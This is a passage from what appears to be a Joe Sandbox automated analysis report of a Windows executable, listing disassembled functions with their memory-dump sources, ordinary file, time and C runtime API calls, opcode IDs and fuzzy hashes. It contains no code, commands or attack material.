                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                                                                            • Opcode ID: 1dd24f7105ff8e7d48a2fb442a16f04649d1343116b9e24a6dd38911d1b00d9f
                                                                                                                                                                                                            • Instruction ID: 170f9fa368eb4ea0dc854247a3a3d22b1a27bc73761924dda7b83de7270099bb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1dd24f7105ff8e7d48a2fb442a16f04649d1343116b9e24a6dd38911d1b00d9f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34513B72F0A6119AFB28EB24844527CE7916B04359F921275EE2D63AF4DF3CE842C710
                                                                                                                                                                                                            Function 00007FF7ACE94704 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                                                                            • Opcode ID: 63aa3601c86c8dfc24442af54b1f99864ddc5ecbce9f9230940c2bf8df8b37fb
                                                                                                                                                                                                            • Instruction ID: 417133dbb9fd28cdd27ecda7881c653a1f7f20a2f3b65087941487c5a573c9f9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63aa3601c86c8dfc24442af54b1f99864ddc5ecbce9f9230940c2bf8df8b37fb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9551A172E0D641AAF720EFB0D4503BDB3E1AB44B88F568534EE09676A8DF3CD45087A0
                                                                                                                                                                                                            Function 00007FF7ACE8AE3C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1452418845-0
                                                                                                                                                                                                            • Opcode ID: fe3ada7a8cc56a4ed65094338cfa1a217e5e95ba653fb5ab557310939df0f8c4
                                                                                                                                                                                                            • Instruction ID: 29700192a4efe9e48a7d437070b0e25b3d7a3c8b07590e134fd32ccb98d7251d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe3ada7a8cc56a4ed65094338cfa1a217e5e95ba653fb5ab557310939df0f8c4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D313D30A0E2C369FA24BB649A122B9B2919F41346FC61434E50D772F3DE2CE8558774
                                                                                                                                                                                                            Function 00007FF7ACE945B0 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1279662727-0
                                                                                                                                                                                                            • Opcode ID: e466375c137080442015770c21472d3ddd744ca47b074c7543c7a5c04326b230
                                                                                                                                                                                                            • Instruction ID: c6bf98c19e0207ae2426b46a880b279a3e15c35de16de4c5cd03d4c283859393
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e466375c137080442015770c21472d3ddd744ca47b074c7543c7a5c04326b230
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0241A472D1D78253E714AB609500379E3A0FB95754F519334E65C13AE2DF7CE5E08750
                                                                                                                                                                                                            Function 00007FF8A7EA8F80 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285465088.00007FF8A7EA1000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FF8A7EA0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285448152.00007FF8A7EA0000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285487043.00007FF8A7EBC000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285506628.00007FF8A7EC9000.00000004.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285524281.00007FF8A7ECF000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ea0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Unicode_$LibrarySize$Arg_CharDeallocErr_ErrorFormatFreeLastLoadObject_ParseTuple_Wide_strdup
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2194358736-0
                                                                                                                                                                                                            • Opcode ID: 800e931c87910f5cf7712dccc7242d46a04d84ff6e1b08f724b4a1a7dda90a5a
                                                                                                                                                                                                            • Instruction ID: 3dd48c266bf671546ea78c7774623090533b1b1032c5780ea60f090303fa64ad
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 800e931c87910f5cf7712dccc7242d46a04d84ff6e1b08f724b4a1a7dda90a5a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF016936A0EA87A2EB158F60E48007DA3A1FF88FD5B044031DA8D02724DF3CE964D740
                                                                                                                                                                                                            Function 00007FF8A7EB9890 Relevance: 4.5, APIs: 3, Instructions: 48COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285465088.00007FF8A7EA1000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FF8A7EA0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285448152.00007FF8A7EA0000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285487043.00007FF8A7EBC000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285506628.00007FF8A7EC9000.00000004.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285524281.00007FF8A7ECF000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ea0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$DeallocDict_FromItemUnicode_
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2460041365-0
                                                                                                                                                                                                            • Opcode ID: dd7a0410b3dfcedf574aa5a44152aab72056744570996d671c7b4064f4b2a526
                                                                                                                                                                                                            • Instruction ID: c932d81249c4cfa898f9b7e5c8161518aa9d6cbfcece13fd0b5f7fdd74fc0602
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd7a0410b3dfcedf574aa5a44152aab72056744570996d671c7b4064f4b2a526
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20117C32A0EB81A5EB508F1AA44427D6BA5FBC9FD0F488231DB5D437A8CF3CD4619300
                                                                                                                                                                                                            Function 00007FF7ACE8F2CC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 4e38ebb67bc940453e85471c4fa41f8c71406493bfbb1ff44c5ef19ba65e7d48
                                                                                                                                                                                                            • Instruction ID: fbf80394fc03612bad376d471496813a6d3cccc3fca5e8568ee1b65ace1a1466
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e38ebb67bc940453e85471c4fa41f8c71406493bfbb1ff44c5ef19ba65e7d48
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A251D731B0E2C296EA64BF25960067AF191BF44BA5F964631EE6D537E5CF3CE4408720
                                                                                                                                                                                                            Function 00007FF7ACE9B534 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(?,?,?,?,00000000,00007FF7ACE9B6CD), ref: 00007FF7ACE9B580
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF7ACE9B6CD), ref: 00007FF7ACE9B58A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                            • Opcode ID: 9f733d69f420b8b04d1076dad759c709488f53e52c8dcc29dc1aedb5cdeb4cec
                                                                                                                                                                                                            • Instruction ID: b236e0acb1143df32565c910cc485c5510d102f6c2de4b6e2855251ae603b22e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f733d69f420b8b04d1076dad759c709488f53e52c8dcc29dc1aedb5cdeb4cec
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B11EF72A1DB8191DB20AB25A404069E362AB45FF4F950731EE7E277F8CF3CD0148700
                                                                                                                                                                                                            Function 00007FF7ACE948AC Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE947C1), ref: 00007FF7ACE948DF
                                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE947C1), ref: 00007FF7ACE948F5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                                                                                            • Opcode ID: 3187d087db2b214abcb8657b9371278066060ab850da1b3f30db97418e55af6d
                                                                                                                                                                                                            • Instruction ID: 6205ec6df0a70a499e3491a645bc1f50fae3bde877d72fe25803a1ac692541d8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3187d087db2b214abcb8657b9371278066060ab850da1b3f30db97418e55af6d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F11A33260D74292EB64AF14A40113AF7A0FB85771F911235FA9EA59F8EF3CD014CB20
                                                                                                                                                                                                            Function 00007FF7ACE99F58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,00007FF7ACE99DD5,?,?,00000000,00007FF7ACE99E8A), ref: 00007FF7ACE99FC6
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7ACE99DD5,?,?,00000000,00007FF7ACE99E8A), ref: 00007FF7ACE99FD0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseErrorHandleLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 918212764-0
                                                                                                                                                                                                            • Opcode ID: ac9e98b412a5961d7460aa12ad0ec3afb474dab09b1a01e5b31658786db65771
                                                                                                                                                                                                            • Instruction ID: f212e00d94b546897feb5dbb36810383f54acc7c504cc42195d00a107fbcb905
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac9e98b412a5961d7460aa12ad0ec3afb474dab09b1a01e5b31658786db65771
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E21A431F1E64261FA90B725948127DD6929F447A0F8A42B5F92F673F1CE6CE8454320
                                                                                                                                                                                                            Function 00007FF7ACE9B2AC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 4ee447531585d2975da1dcda293718dbcf43dcc67f1dbe5b8b161bd0b0a82fe6
                                                                                                                                                                                                            • Instruction ID: 502f9ef47861c96b455c7ba7470b68fe3d803cfc4eef2d7cb42edda025b797f2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ee447531585d2975da1dcda293718dbcf43dcc67f1dbe5b8b161bd0b0a82fe6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A541E33291E24197EA34EB29A44027DF3A0EB55B80F910571EB8EA36A1CF6DE502C761
                                                                                                                                                                                                            Function 00007FF7ACE87170 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                                                                            • Opcode ID: 10145a3690c617f4dd18dc8dea0a642c8d55cb4e7d8258adcb003599594c72b0
                                                                                                                                                                                                            • Instruction ID: 216a54b04a4388f508cd47263ae70df9a4cdc44f0bfe7c0f40d6410a4c57451f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10145a3690c617f4dd18dc8dea0a642c8d55cb4e7d8258adcb003599594c72b0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1217E71B0E292A5EA50BB5266047BAF651BF45BD5FCA4031FE0D277A6CE7DE041C320
                                                                                                                                                                                                            Function 00007FF7ACE9AD3C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 7d59e4c40900bb32387b6d96138c4a28a58e0b2ab210e317c35ca26ebe7fd99a
                                                                                                                                                                                                            • Instruction ID: d257121954ad7f83b24e13496ab3e6114e1ae586e19b04122d7d6aa0df7398fe
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d59e4c40900bb32387b6d96138c4a28a58e0b2ab210e317c35ca26ebe7fd99a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84319031A1E612A5E751BB25884037CF690AF51B95F8206B5FA2D233F2CF7CE8518370
                                                                                                                                                                                                            Function 00007FF7ACE953F8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                                                                                                            • Instruction ID: e56de3a77e36c1109090171b7aa4f20373f0aa374b694d8b0763171c483218bf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA119331A0F64591EE60FF51940127DE3A0BF85B80F8A4675FA8C676AACFBDE5008760
                                                                                                                                                                                                            Function 00007FF7ACEA568C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
